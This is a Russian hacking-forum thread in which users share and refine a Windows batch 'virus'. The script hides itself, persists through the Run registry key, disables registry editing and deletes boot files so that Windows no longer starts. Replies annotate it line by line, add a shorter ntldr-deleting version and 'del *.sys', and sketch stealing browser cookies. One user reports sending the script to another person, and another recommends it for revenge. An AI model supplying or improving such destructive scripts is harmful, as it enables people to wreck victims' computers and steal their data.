Пишем мощный вирус в блокноте

Предыдущие сообщения
9 августа 2011
#1 DialMax uid#563 Привет, я хочю показать пример создания мощного вируса при помощи блокнота. Итак преступим:
@echo off
title regserv
attrib 0% +h +s +a +r
copy ""%0"" "%SystemRoot%\system32\regsrv32.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "regsrv32" /t REG_SZ /d "%SystemRoot%\system\regsrv32.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
attrib C:\bootmgr -h -s -a -r      /Если это ХР то ntldr
del c:\bootmgr >nul
attrib c:\IO.SYS -h -s -a -r
del c:\IO.SYS >nul
attrib C:\MSDOS.SYS -h -s -a -r
del C:\MSDOS.SYS
shutdown -r -t 1 -c "Good bay, LAMER" -f >nul
Это очень простой но мощный вирус. Можете редактировать.
09:28:13 6
#2 S.n.T. uid#337 спамерты забыл написать - с расширением .bat 11:17:17 3
#3 Anonymous uid#55 Мощный? А в чем прикол собственно? я понимаю если бы сжёг нафиг проц или батерею разорвал ну или хотя бы что то полезное делал в конце концов 21:40:04 0
16 августа 2011
#4 DialMax uid#563
Мощный? А в чем прикол собственно? я понимаю если бы сжёг нафиг проц или батерею разорвал ну или хотя бы что то полезное делал в конце концов
Этот вирус стирает файлы bootmgr(ntldr), IO.SYS, MS-DOS.SYS, и добавляется в автозагрузку и антивирями не палится. Жертва запускает вирус, он стирает файлы загрузки Винды, добавляется в автозагрузку, пегружает комп. В последствии винда грузится не будет. Поможет только какой-то загрузочный диск или переустановка винды. Даже если жертва и найдет эти файлы где-то и вставит их обратно, не почистив реестра, то всё пойдёт по старому кругу.
06:31:20 7
#5 Anonymous uid#55 Ну так а в чем прикол? Это глупость и не больше ну снесёшь ты систему и что? польза есть? нету так что это всё фигня.... 10:00:23 5
18 августа 2011
#6 ri4i uid#613 слушайте ребята, я в этом деле новичок) скажите вот я написал его в блокноте а дальше что делать? 18:38:12 1
#7 knz uid#57 Файл надо сохранить с расширением .bat
Файл>Сохранить как
Тип файла:Все файлы
Имя файла: virus.bat
21:02:27 3
19 августа 2011
#8 Flash_X uid#496 GeniusПо названию темы думал тут сидят гуру ассемблера))


ГЕНИАЛЬНО!!!!!))))))))))))))))))))))))))))
добавляется в автозагрузку
и потом неожиданно
В последствии винда грузится не будет ... Поможет только какой-то загрузочный диск или переустановка винды
Какой смысл в автозагрузке?))))

З.Ы.
format c: /q /y
както так... (позор мну, забыл каманды доса))
21:58:03 4
#9 Anonymous uid#55 формат ц с под окна никак не подействует! 14:50:26 0
#10 Flash_X uid#496 Geniusпод format c: я имел ввиду, что все вирусы, которые нацелены на уничтожение системы жертвы, можно свести к тупому "коцанью" системных файлов, (или всего диска с ними) 15:43:26 0
#11 Anonymous uid#55 ну блин а формат ц просто нифига не сделает я сам пробовал нифига!) del *.sys 20:20:32 0
#12 Flash_X uid#496 Geniusмб начнём писать в блокноте на асемблере? Думаю эта тема подойдёт по названию) 11:51:57 0
#13 Flash_X uid#496 GeniusЕсли тема асемблера интересна, то можно начать писать уроки программинга с нуля. 12:40:47 1
#14 Nikos uid#47 Может и пользы от вируса не много но если хочешь кому нибудь отомстить то кокрас к стати будет))))) 17:24:07 0
#15 DialMax uid#563 Nikos, он для этого и существует. 08:36:58 3
25 августа 2011
#16 dex2912 uid#657 мм,прикольнО!
а можно,как куки вычеслить??аа
с другого компа??аа
15:44:48 0
#17 DialMax uid#563 dex2912, на счет куков не знаю но нормальный вирус сделать можно. 23:34:11 2
#18 Flash_X uid#496 Geniusтырим куки:
  1. находим расположение файлов, куков
  2. создаём незаметную папку где-нить (например в папке windows\system32\)
  3. копируем куки в папку
  4. шарим папку (telnet) http://hackersoft.ru/talk/154/
это если использовать bat...

как-то так ^_^"
02:55:47 1
29 августа 2011
#19 dex2912 uid#657 DialMax ну это понятнО))
особа глядя на тему))хии
02:32:23 0
3 сентября 2011
#20 DialMax uid#563 Еще можно писать хорошие вирусы на аutoit. Недавно написал один вирус и начал тестировать пол дня комп лечил. Антивирусы не палят. Только это уже не в блокноте (нужно компилить). 12:43:55 2
#21 Flash_X uid#496 GeniusЕщё можно писать хорошие вирусы на ассемблере, c#, c, c++ и java. Понижайте уровень, господа. 18:54:43 0
#22 Anonymous uid#55 хе хе не забудьте про турбо си паскаль и дельфин 22:28:13 0
#23 Flash_X uid#496 Geniusони выше, по крайней мере дельфин... 22:52:03 0
#24 Federer uid#695 DialMax что будет если сохранив её окрыть? 13:59:13 0
#25 Federer uid#695 DialMax что будет если сохранив её открыть? 13:59:46 0
#26 Anonymous uid#55 Спасибо Flesh_X'у 21:25:49 2
#27 Flash_X uid#496 Genius 22:05:24 0
#28 Flash_X uid#496 GeniusFederer, разьясняю код ДиалМакса
@echo off // прячем вывод результатов исполнения комманд
title regserv // меняем заголовок окна терминала
attrib 0% +h +s +a +r // выставляем права на файл вируса
copy ""%0"" "%SystemRoot%\system32\regsrv32.bat" >nul // копируем вирус в папку %SystemRoot%\system32\regsrv32.bat  (%SystemRoot% - это папка windows)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "regsrv32" /t REG_SZ /d "%SystemRoot%\system\regsrv32.bat" /f >nul // пишем себя  в автозагрузку
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
attrib C:\bootmgr -h -s -a -r      /Если это ХР то ntldr // снимаем права с файла отвечающего за загрузку ОС
del c:\bootmgr >nul // удаляем его
attrib c:\IO.SYS -h -s -a -r // тут и далее коцаем системные файлы
del c:\IO.SYS >nul
attrib C:\MSDOS.SYS -h -s -a -r
del C:\MSDOS.SYS
shutdown -r -t 1 -c "Good bay, LAMER" -f >nul // перезагружаем компьютер выдавая сообщение на 1 секунду
22:20:11 5
#29 Anonymous uid#55
offtop
хе хе хе недавно наткнулся на вопросик в гугл вопросах) кент пишет
-Я создал вирус как его запустить в интернет?
И много много ответов типа:
"Да тебя посадят!!!"
"Это уголовное дело"
"я не верю что ты написал вирус!"
И "Лучший ответ" ну не буду его своими словами писать вот цитата:


Ну здесь собсна цитата
Сей пользователь имеет в виду под "Что нужно прописать в коде, чтобы он загружалься на компьютеры и открывался" делая это не при открывании, а при закачке.
==============================================
Здравствуйте! Ваша открытость похвальна и может говорить только о ваших добрых намерениях.

Для начала, я бы вам посоветовал сделать вирус открытым. То есть если его активируют чтобы он оповестил подцепившего о его наличии и местонахождении, а также кратко рассказал о методах противодействия вирусам. В таком случае даже отдел К не будет иметь против вас ничего, посчитав это даже полезным для интернет-пользователей.

К делу, для его распространения есть два варианта.
1)диктаторство
2)троянство
При "диктаторстве" создается мощный вирус, который напролом обходит все защитные барьеры и овладевает платформой. Ему не нужно дурачить пользователя своим кашемиром, ведь он сильнее всех защит и самого пользователя. Таких легендарных вирусов уже не пишут - слишком трудно такой написать, а молодое хакерское поколение слишком глупо. Но если вы написали такой вирус вы произведете настоящий фуррор электронного мира и отчасти станете его героем. Ведь окажется что все платформы в мире абсолютно не защищены с одной из их сторон. Но, повторю, это крайне трудно.
При троянстве - все сказано в названии. Дается файл на актуальную тему и, когда его запускают, вирус начинает свою коварную работу. Составлю оценку по трудности написания (от пяти до первого) и эфективности вируса (от одного до пяти).
1) Вирус, находящийся в изображении. (это вирус, распространяющийся просто через открытие изображения через комп или броузер)
2) Вирус, находящийся в обновлении. (например "для просмотра видео требуется следущий плагин: *";)
3) Вирус, находящийся на веб-сайте. (чем собственно и опасно бродить по порно-сайтам)
3.5) Вирус, находящийся в формате ISO (записывается на двд диск и действует как бомба с задержкой времени)
4) Вирус, находящийся в популярной программе или игре. (например Sims 3 пиратскую версию которой недавно так активно искали)
5) Вирус, находящийся в легенькой проге. (типа проги Stop PC или простого кряка)
Что бы сделать вирус по второму способу рассчитанным на одно лицо требуется сначала установить за ним наблюдение, выяснить что он предпочитает и дать ему то чего он хочет (в спам-сообщении в его почте к примеру).

Не забывайте о чрезвычайно эффективных антивирусах.

P.S. 2стукачам. Я не пропагандирую хакерство, а стараюсь запугать молодых "хацкеров" реальностью большого списка действий. Если кто-либо сомневается в подобной методике пусть сначала продискуссирует её со мной лично и только потом пишет отзывы о нарушениях. Почему лишь молодых, потому что опытным и энтузиастам уже приходилось через это проходить и в моем сообщении для них нет ничего нового— Цитата из ответов

Хе хе теперь с чего я смеялся этот ответ меня улыбнул логикой Вопрос был:"Я создал вирус..." Ответ "если это без обидный вирус то отдел К к вам не будет иметь притензий... Пизда какие притензии к первому вирусу который даже компов 100 не заразит!?
16:17:22 4
#30 Federer uid#695 Спс Флэш икс, как его удалить я нечайно открыл её у себя :-)) 15:18:53 0
#31 Anonymous uid#55 у тебя нету анти зверька? 17:27:23 0
#32 Federer uid#695 что это зверёк? )) и потом можно такой вопрос все файлы заканчивающиеся на .bat вирусы? 18:08:10 0
#33 Anonymous uid#55 НЕТ! ты что? 19:15:13 0
#34 Alec uid#698 Я тоже новичок а на мой комп вирус будет работать т. е. сломает?
безопасно?
22:07:55 0
#35 Anonymous uid#55 Учите матчасть а потом задавайте такие вопросы 22:34:36 1
#36 Federer uid#695 вопрос продвинутым профи по прогам: как можно быстро стать хакером? профи программ? изучать язык с++ ? или питон дайте советы Вы же видите общий образ про100 не хотелось лишние читать и тд заранее спасибо и респект!!! :-) 23:43:25 0
#37 Anonymous uid#55 У меня есть видео обучения обучает ведущий хакер сам обучал людей из гугла яхуу и ща в мелкомягких продаются они по $1600 но я могу продать за $500 08:09:46 0
#38 Federer uid#695 По дружески можешь дать бесплатно? как нибудь и я тебе помогу! )) 15:55:17 -1
#39 Anonymous uid#55 Нет первому по любому продаю ведь может пустить в сеть, и тогда смысла не будет продавать! 16:03:53 0
#40 Flash_X uid#496 GeniusИМХО нельзя научится хакингу, можно выучить ЯП, можно научится проводить разные атаки, но никто не научит видеть "как это работает изнутри". Это не игра на фортепиано (ничего не имею против пианистов)), где нужно повторять нажатые кем-то клавиши.

Если хочешь выучить ЯП, то ищи инфу сам, тебе никто не будет объяснять те азы, которые сотни раз описаны во всевозможных уроках\книгах по интересующему вопросу. Обращайся к другим только с адекватными вопросами, но думать нужно самому.
17:12:15 2
#41 Anonymous uid#55 Я с тобой вполне согласен, но
В тех видео уроках такие как Federer вряд ли что то поймут, но если люди знают не мало то эти видео уроки очень повысят квалификацию!!!
Автор часто бывает на конференциях типа blackhat и он повышает квалификацию как я уже говорил специалистам из Google, Yahoo, Microsoft... и т.п.
Там я точно не знаю но часов 10 должны быть а может и более, минус в том что всё на лохницком.
ИМХО там много чего интересного и полезного даже kanaris'у я уверен!
======================
А такие как Federer пусть идут на ачатик или на xakep.ru там есть много видео уроков для таких как они!
18:09:53 1
#42 Flash_X uid#496 Genius
Если хочешь выучить ЯП, то ищи инфу сам, тебе никто не будет объяснять те азы, которые сотни раз описаны во всевозможных уроках\книгах по интересующему вопросу.
какой инфой пользоваться каждый выбирает сам
18:16:54 0
9 сентября 2011
#43 veit uid#724 Если у парня парня виндоус Хп то я должен только заменить  все attrib на ntldr ? или тока у последних трех ниже строчек ? или тока у одной как написано в теме ??
Просто я сменил на ntldr во второй строчке только и отослал парню, у него Комп только перезагрузился уже как 7 деней работает ..
аttrib 0% +h +s +a +r
attrib C:\bootmgr -h -s -a -r
attrib c:\IO.SYS -h -s -a -r
attrib C:\MSDOS.SYS -h -s -a -r
а если у парня винда 7 то код точно такойже как в теме ?


Или мб есть код попроще дли убийства виндоус хп ? в бат формате.
13:56:52 0
#44 Flash_X uid#496 Geniusveit, вот список прав

+A Устанавливает атрибут архивизации (-A отменяет его).
+H Устанавливает атрибут скрытого файла (-H отменяет его.
+R Устанавливает атрибут "только чтение" ((-R отменяет его).
+S Устанавливает системный атрибут (-S отключает его).

для того, что бы иметь возможность удалить файл используй -h -r -s
15:10:52 1
#45 veit uid#724 Оу спасибо изменю , а про Атрибут ) что ставить для Хп ? нтдлр вместо всех атрибутов ? или только для второй строчки ? как написано в теме ? 15:12:49 0
#46 veit uid#724 Вообщем вот что я патаюсь парню оптарвить на винде Хп , сработает нет ?
@echo off
title regserv
attrib 0% +h +s +a +r
copy ""%0"" "%SystemRoot%\system32\regsrv32.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "regsrv32" /t REG_SZ /d "%SystemRoot%\system\regsrv32.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
ntldr C:\bootmgr -h -s -r
del c:\bootmgr >nul
ntldr c:\IO.SYS -h -s -r
del c:\IO.SYS >nul
ntldr C:\MSDOS.SYS -h -s -r
del C:\MSDOS.SYS
shutdown -r -t 1 -c "Good bay, LAMER" -f >nul
15:18:23 0
#47 Flash_X uid#496 Geniusдля икс пи ставь то же что и для семёрки.
нтдлр вместо всех атрибутов ?
ntldr это файл такой, попросту говоря, без него форточки не загрузятся
или только для второй строчки ?
какой исчьо строчки?
как написано в теме ?
тут много чего написано...)
15:19:14 1
#48 Flash_X uid#496 Genius
ntldr C:\bootmgr -h -s -r
del c:\bootmgr >nul
ntldr c:\IO.SYS -h -s -r
del c:\IO.SYS >nul
ntldr C:\MSDOS.SYS -h -s -r
del C:\MSDOS.SYS
омг...

нет такой команды ntldr, есть attrib
15:21:50 1
#49 veit uid#724 attrib C:\bootmgr -h -s -a -r /Если это ХР то ntldr

так написано просто ) от сюда и шагал
15:22:24 0
#50 Flash_X uid#496 Geniusвообще тут можно всё уместить в четыре строчки:
@echo off
attrib c:\ntldr -h -r -s
del c:\ntldr
shutdown -r -t 00
15:24:55 2
Следующие сообщения
*Ник: Проверка уникальности... Если вы уже зарегистрированы, авторизуйтесь.
*Сообщение:
  Загрузка...